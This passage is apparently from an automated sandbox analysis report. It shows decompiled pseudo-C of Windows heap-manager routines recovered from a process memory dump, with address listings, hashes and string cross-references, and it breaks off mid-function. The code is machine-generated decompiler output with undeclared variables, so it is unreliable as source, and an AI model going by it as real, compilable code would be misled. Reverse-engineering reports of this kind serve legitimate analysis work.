Instruction Fuzzy Hash: E2819375E0026A9BCB08DFA5D88066EBBF5FF8C201F15866AD455EB340DB70A951CF80

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C99BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E1E3C99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E1E45FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E1E46A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E1E3FD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E1E3AB150();
										} else {
											E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E1E3AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1e496378 = 1;
											asm("int3");
											 *0x1e496378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E1E3CA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E1E3CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E1E3CBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E1E46A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E1E3CA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E1E3CA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E1E3FD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E1E3AB150();
								} else {
									E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E1E3AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1e496378 = 1;
									asm("int3");
									 *0x1e496378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E1E45FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E1E46A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E1E3FD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E1E3AB150();
													} else {
														E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E1E3AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1e496378 = 1;
														asm("int3");
														 *0x1e496378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E1E3CA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E1E3CA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E1E3CBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E1E46A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E1E3FD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E1E3AB150();
													} else {
														E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E1E3AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1e496378 = 1;
														asm("int3");
														 *0x1e496378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E1E3CA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E1E3CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E1E3CBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E1E3CBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x1e3c99ca
0x1e3c99cc
0x1e3c99df
0x1e3c99e3
0x1e3c99f8
0x1e3c99fb
0x1e3c99fb
0x00000000
0x1e3c9a48
0x1e3c9a48
0x1e3c9a4c
0x1e3c9a51
0x1e3c9a55
0x1e3c9a61
0x1e3c9a66
0x1e3c9a68
0x1e411457
0x1e41145c
0x1e41145c
0x1e3c9a68
0x1e3c9a6e
0x1e3c9a71
0x1e3c9a74
0x1e3c9a76
0x1e411466
0x1e411469
0x1e411469
0x1e41146c
0x1e41146e
0x1e411471
0x1e411474
0x1e411477
0x1e411479
0x1e41159c
0x1e41159c
0x1e41159d
0x1e4115a6
0x1e4115ab
0x1e4115ab
0x00000000
0x1e4115ab
0x1e41147f
0x1e411481
0x00000000
0x00000000
0x1e41148a
0x1e41148d
0x1e411493
0x1e411495
0x1e4114c0
0x1e4114c0
0x1e4114c3
0x1e4114c6
0x1e4114c8
0x1e4114cb
0x1e4114cf
0x1e4114f2
0x1e4114f2
0x1e4114f5
0x1e4114f8
0x1e411501
0x1e411508
0x1e41150b
0x1e41150e
0x1e411510
0x1e411513
0x1e411515
0x1e411515
0x1e411518
0x1e411518
0x1e411513
0x1e411521
0x1e411525
0x1e41152a
0x1e41152d
0x1e411530
0x1e411532
0x1e411539
0x1e41153d
0x1e41155d
0x1e411562
0x1e41153f
0x1e411555
0x1e41155a
0x1e411570
0x1e411577
0x1e41157c
0x1e411582
0x1e411585
0x1e411589
0x1e41158b
0x1e411592
0x1e411593
0x1e411593
0x1e411589
0x1e411530
0x00000000
0x1e4114f8
0x1e4114d5
0x1e4114da
0x1e4114dc
0x00000000
0x1e4114de
0x1e4114e8
0x00000000
0x1e4114e8
0x1e411497
0x1e411497
0x1e4114a4
0x1e4114a4
0x1e4114a7
0x1e4114a9
0x1e4114ab
0x1e4114ab
0x1e41149c
0x1e41149e
0x1e4114a0
0x1e4114b0
0x1e4114b0
0x00000000
0x1e4114a2
0x1e4114a2
0x00000000
0x1e4114a2
0x1e4114a0
0x1e4114b3
0x1e4114bb
0x00000000
0x1e4114bb
0x1e411495
0x1e3c9a7c
0x1e3c9a7c
0x1e3c9a7f
0x1e3c9a7f
0x1e3c9a82
0x1e3c9a84
0x1e3c9a87
0x1e3c9a8a
0x1e3c9a8d
0x1e3c9a8f
0x1e41166a
0x1e41166a
0x1e41166b
0x1e411674
0x00000000
0x1e411674
0x1e3c9a95
0x1e3c9a97
0x00000000
0x00000000
0x1e3c9aa0
0x1e3c9aa3
0x1e3c9aa9
0x1e3c9aab
0x1e3c9ad7
0x1e3c9ad7
0x1e3c9ada
0x1e3c9add
0x1e3c9adf
0x1e3c9ae2
0x1e3c9ae6
0x1e3c9b22
0x1e3c9b27
0x1e3c9b29
0x00000000
0x1e3c9b2b
0x1e4115be
0x00000000
0x1e4115be
0x1e3c9b29
0x1e3c9ae8
0x1e3c9ae8
0x1e3c9aeb
0x1e3c9aee
0x1e4115cb
0x1e4115d2
0x1e4115d5
0x1e4115d7
0x1e4115da
0x1e4115dc
0x1e4115dc
0x1e4115dc
0x1e4115da
0x1e4115e5
0x1e4115e9
0x1e4115ee
0x1e4115f1
0x1e4115f3
0x1e4115f9
0x1e411600
0x1e411604
0x1e411624
0x1e411629
0x1e411606
0x1e41161c
0x1e411621
0x1e411637
0x1e41163e
0x1e411643
0x1e411649
0x1e41164c
0x1e411650
0x1e411656
0x1e41165d
0x1e41165e
0x1e41165e
0x1e411650
0x1e4115f3
0x1e3c9af4
0x1e3c9af7
0x1e3c9afc
0x1e3c9b00
0x1e3c9b04
0x1e3c9b08
0x1e3c9b14
0x1e3c99fe
0x1e3c9a04
0x1e3c9a07
0x00000000
0x1e3c9a29
0x1e41169c
0x1e4116a0
0x1e4116a5
0x1e4116a9
0x1e4116b5
0x1e4116ba
0x1e4116bc
0x1e4116be
0x1e4116c3
0x1e4116c3
0x1e4116bc
0x1e4116c8
0x1e4116cc
0x1e41181b
0x1e41181b
0x1e41181e
0x1e41181e
0x1e411821
0x1e411823
0x1e411826
0x1e411829
0x1e41182c
0x1e41182e
0x1e411688
0x1e411688
0x1e411689
0x1e41168b
0x1e41168c
0x1e41168d
0x1e41168f
0x1e411692
0x00000000
0x1e411692
0x1e411834
0x1e411836
0x00000000
0x00000000
0x1e41183f
0x1e411842
0x1e411848
0x1e41184a
0x1e411875
0x1e411875
0x1e411878
0x1e41187b
0x1e41187d
0x1e411880
0x1e411884
0x1e4118a7
0x1e4118a7
0x1e4118aa
0x1e4118ad
0x1e4118b6
0x1e4118bd
0x1e4118c0
0x1e4118c3
0x1e4118c5
0x1e4118c8
0x1e4118ca
0x1e4118ca
0x1e4118cd
0x1e4118cd
0x1e4118c8
0x1e4118d5
0x1e4118da
0x1e4118df
0x1e4118e2
0x1e4118e5
0x1e4118e7
0x1e4118ee
0x1e4118f2
0x1e411912
0x1e411917
0x1e4118f4
0x1e41190a
0x1e41190f
0x1e411925
0x1e41192c
0x1e411931
0x1e41193a
0x1e41193e
0x1e411940
0x1e411947
0x1e411948
0x1e411948
0x1e41193e
0x1e4118e5
0x1e41194f
0x1e411952
0x1e411956
0x1e41195d
0x1e411961
0x1e41196d
0x00000000
0x1e41196d
0x1e41188a
0x1e41188f
0x1e411891
0x00000000
0x00000000
0x1e41189d
0x00000000
0x1e41189d
0x1e41184c
0x1e411859
0x1e411859
0x1e41185c
0x00000000
0x00000000
0x1e411851
0x1e411853
0x1e411855
0x1e411865
0x1e411865
0x1e411866
0x1e411868
0x1e411870
0x00000000
0x1e411870
0x1e411857
0x1e411857
0x1e41185e
0x00000000
0x1e4116d2
0x1e4116d2
0x1e4116d5
0x1e4116d5
0x1e4116d8
0x1e4116da
0x1e4116dd
0x1e4116e0
0x1e4116e3
0x1e4116e5
0x1e411808
0x1e411808
0x1e411809
0x1e411812
0x1e411817
0x1e411817
0x00000000
0x1e411817
0x1e4116eb
0x1e4116ed
0x00000000
0x00000000
0x1e4116f6
0x1e4116f9
0x1e4116ff
0x1e411701
0x1e41172c
0x1e41172c
0x1e41172f
0x1e411732
0x1e411734
0x1e411737
0x1e41173b
0x1e41175e
0x1e41175e
0x1e411761
0x1e411764
0x1e41176d
0x1e411774
0x1e411777
0x1e41177a
0x1e41177c
0x1e41177f
0x1e411781
0x1e411781
0x1e411784
0x1e411784
0x1e41177f
0x1e41178c
0x1e411791
0x1e411796
0x1e411799
0x1e41179c
0x1e41179e
0x1e4117a5
0x1e4117a9
0x1e4117c9
0x1e4117ce
0x1e4117ab
0x1e4117c1
0x1e4117c6
0x1e4117dc
0x1e4117e3
0x1e4117e8
0x1e4117ee
0x1e4117f1
0x1e4117f5
0x1e4117f7
0x1e4117fe
0x1e4117ff
0x1e4117ff
0x1e4117f5
0x1e41179c
0x00000000
0x1e411764
0x1e411741
0x1e411746
0x1e411748
0x00000000
0x00000000
0x1e411754
0x00000000
0x1e411754
0x1e411703
0x1e411710
0x1e411710
0x1e411713
0x00000000
0x00000000
0x1e411708
0x1e41170a
0x1e41170c
0x1e41171c
0x1e41171c
0x1e41171d
0x1e41171f
0x1e411727
0x00000000
0x1e411727
0x1e41170e
0x1e41170e
0x1e411715
0x00000000
0x1e411715
0x1e4116cc
0x1e3c9a45
0x1e3c9a45
0x1e3c9a0e
0x1e3c9a1c
0x1e3c9a23
0x1e41167e
0x1e41167f
0x1e411681
0x1e411683
0x1e411684
0x00000000
0x1e411684
0x00000000
0x1e3c9aad
0x1e3c9aad
0x1e3c9ab0
0x1e3c9ab3
0x1e3c9ab3
0x1e3c9ab6
0x00000000
0x00000000
0x1e3c9ab8
0x1e3c9aba
0x1e3c9abc
0x1e3c9ac8
0x1e3c9ac8
0x00000000
0x1e3c9abe
0x1e3c9abe
0x1e3c9ac0
0x00000000
0x1e3c9ac0
0x1e3c9abc
0x1e3c9ad2
0x00000000
0x1e3c9ad2
0x1e3c9aab

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 1E411572, 1E411639, 1E4117DE, 1E411927
HEAP[%wZ]: , xrefs: 1E411550, 1E411617, 1E4117BC, 1E411905
HEAP: , xrefs: 1E41155D, 1E411624, 1E4117C9, 1E411912

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 4ef6cfa685c8d965faa6d78945f83d34e0dee6af7092d216b50d25dbf5d07144
Instruction ID: d27ba04f2c1e2d4dcbf960f0361a1b6f8d81c067c0319cc1f6b2f3bad87cb6fe
Opcode Fuzzy Hash: 4ef6cfa685c8d965faa6d78945f83d34e0dee6af7092d216b50d25dbf5d07144
Instruction Fuzzy Hash: 5122F374A006869FDB14CF29C894B6ABBF6EF45704F148BAAE4568F341E735F881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1E4523E3, Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E1E4523E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x1e49874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x1e49874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E1E3FD4F0(_t83, 0x1e386c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1E3AB150();
					} else {
						E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
